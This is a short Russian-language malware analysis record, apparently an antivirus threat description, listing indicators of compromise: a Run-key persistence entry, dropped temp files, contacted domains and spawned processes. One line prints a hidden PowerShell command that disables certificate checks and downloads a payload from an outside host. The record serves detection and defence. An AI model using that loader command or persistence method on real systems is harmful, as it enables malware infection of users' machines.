Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'value' = '%TEMP%\tmp2650.vbe'
- https://picua.org/images/2020/03/22/6287d7edeec6f3e5585ed91289138bec.png
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\4.tmp
- %TEMP%\$inst\5.tmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\tmp3412.exe
- %TEMP%\tmp2650.vbe
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\4.tmp
- %TEMP%\$inst\5.tmp
- 'pi##a.org':443
- 'ip###ger.org':443
- DNS ASK google.com
- DNS ASK pi##a.org
- DNS ASK ip###ger.org
- '%TEMP%\tmp3412.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\tmp2650.vbe"
- '%WINDIR%\syswow64\ping.exe' google.com' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$kzMADfdbzyK='%TEMP%\tmp2650.vbe';$CVfZsD=(New-Object Net.WebClient).DownloadString('https://picua.org/images/2020/03/22/6...' (со скрытым окном)
- '%WINDIR%\syswow64\ping.exe' google.com
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'